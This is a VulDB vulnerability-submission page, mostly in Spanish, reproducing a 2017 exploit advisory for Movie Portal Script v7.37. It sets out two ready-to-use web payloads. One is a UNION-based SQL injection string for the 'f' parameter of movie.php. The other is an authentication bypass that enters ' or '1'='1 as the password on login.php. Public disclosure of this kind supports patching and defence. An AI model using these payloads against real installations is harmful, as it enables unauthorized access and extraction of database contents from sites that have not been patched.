| Título | Movie Portal Script v7.37 – Multiple Vulnerabilities |
|---|
| Descripción | Introduction
Exploit Title: Movie Portal Script v7.37 – Multiple Vulnerabilities
Date: 30.01.2017
Vendor Homepage: http://itechscripts.com/
Software Link: http://itechscripts.com/b2b-script/
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
Movie Portal Script v7.37 is undoubtedly the finest movie portal.
Vulnerabilities:
------------------------------------------------
SQL Injection
URL : http://localhost/movie-portal-script/movie.php?f=10[payload]
Parameter: f (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 34 columns
Payload: f=-2245 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787a71,0x644b626f666d766b5551474756446f6e596d57784165697044776879524c7264714164476e624e55,0x716a6b6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- MmOv
------------------------------------------------
Authentication Bypass
http://localhost/movie-portal-script/login.php
username : anyusername
password : ' or '1'='1
------------------------------------------------ |
|---|
| Usuario | KAAN KAMIS (UID 213) |
|---|
| Sumisión | 2017-01-30 13:27 (hace 9 años) |
|---|
| Moderación | 2017-01-30 21:56 (8 hours later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 96286 [Movie Portal Script 7.37 movie.php f inyección SQL] |
|---|
| Puntos | 17 |
|---|